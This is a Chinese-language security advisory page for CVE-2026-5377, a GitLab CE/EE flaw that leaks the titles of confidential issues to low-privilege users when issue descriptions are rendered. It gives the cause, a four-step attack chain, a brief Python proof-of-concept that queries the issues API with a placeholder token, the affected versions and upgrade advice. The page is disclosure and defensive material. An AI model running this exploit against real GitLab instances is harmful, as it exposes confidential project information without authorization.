IPBUF安全漏洞报告
English
CVE-2026-5377 CVSS 4.3 中危

CVE-2026-5377 GitLab敏感信息泄露漏洞

披露日期: 2026-04-22
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-5377
漏洞类型
信息泄露
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
GitLab CE/EE

相关标签

信息泄露权限绕过GitLabCVE-2026-5377

漏洞概述

GitLab社区版与企业版存在一处敏感信息泄露漏洞,影响所有18.11版本及18.11.1之前的版本。该漏洞源于议题描述渲染过程中的访问控制机制缺陷,导致经过身份认证的攻击者可利用低权限账号,访问并获取公开项目中原本受限的机密或私有议题标题。此漏洞无需用户交互即可通过网络利用,对数据机密性构成一定风险。

技术细节

该漏洞的核心技术成因在于GitLab后端在处理Issue描述渲染时,未对关联内容的访问权限进行严格校验。具体而言,当一个Issue(Issue A)在公开项目中引用或关联了另一个私有项目中的机密Issue(Issue B)时,系统在渲染Issue A的描述或预览信息时,会尝试获取Issue B的元数据以丰富显示内容。然而,受影响的版本仅验证了当前用户对Issue A的读取权限,却忽略了对Issue B的权限检查。这导致低权限用户通过触发渲染逻辑,能够迫使服务器返回本应不可见的Issue B的标题信息。攻击者只需构造特定的API请求或访问特定的Web页面,解析响应中的JSON数据或HTML片段,即可窃取敏感议题的标题信息。虽然无法获取详细内容,但标题往往包含关键业务逻辑或安全漏洞代号。

攻击链分析

STEP 1
侦察
攻击者识别目标的GitLab实例,并确定存在公开项目。
STEP 2
获取凭证
攻击者注册或获取一个低权限的GitLab账户。
STEP 3
漏洞利用
攻击者向公开项目中的特定Issue发送请求,触发后端描述渲染逻辑。
STEP 4
信息获取
攻击者解析API响应或页面内容,提取泄露的机密或私有Issue标题。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Configuration TARGET_URL = "https://gitlab.example.com" PROJECT_ID = "123" # ID of a public project ISSUE_ID = "456" # ID of an issue that might reference private issues PRIVATE_TOKEN = "glpat-xxxxxxxxxxxx" # Valid low-privilege token headers = { "PRIVATE-TOKEN": PRIVATE_TOKEN, "Content-Type": "application/json" } # Exploit attempt: Fetch the issue description # The vulnerability lies in the rendering process potentially leaking titles url = f"{TARGET_URL}/api/v4/projects/{PROJECT_ID}/issues/{ISSUE_ID}" response = requests.get(url, headers=headers) if response.status_code == 200: data = response.json() print("[+] Successfully fetched issue data.") print(f"[+] Issue Description: {data.get('description', 'N/A')}") # Analyze the response for leaked private issue references # In a vulnerable version, referenced private issue titles might appear in the response # where they shouldn't be accessible. print("[+] Check the output above for any titles of private/confidential issues.") else: print(f"[-] Request failed with status code: {response.status_code}")

影响范围

GitLab CE/EE 18.11 < 18.11.1

防御指南

临时缓解措施
建议管理员立即升级到官方修复版本(18.11.1或更高)。在无法立即升级的情况下,应严格限制用户注册以减少潜在攻击面,并加强对异常API访问行为的审计与监控,特别是针对Issue描述渲染接口的频繁调用。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表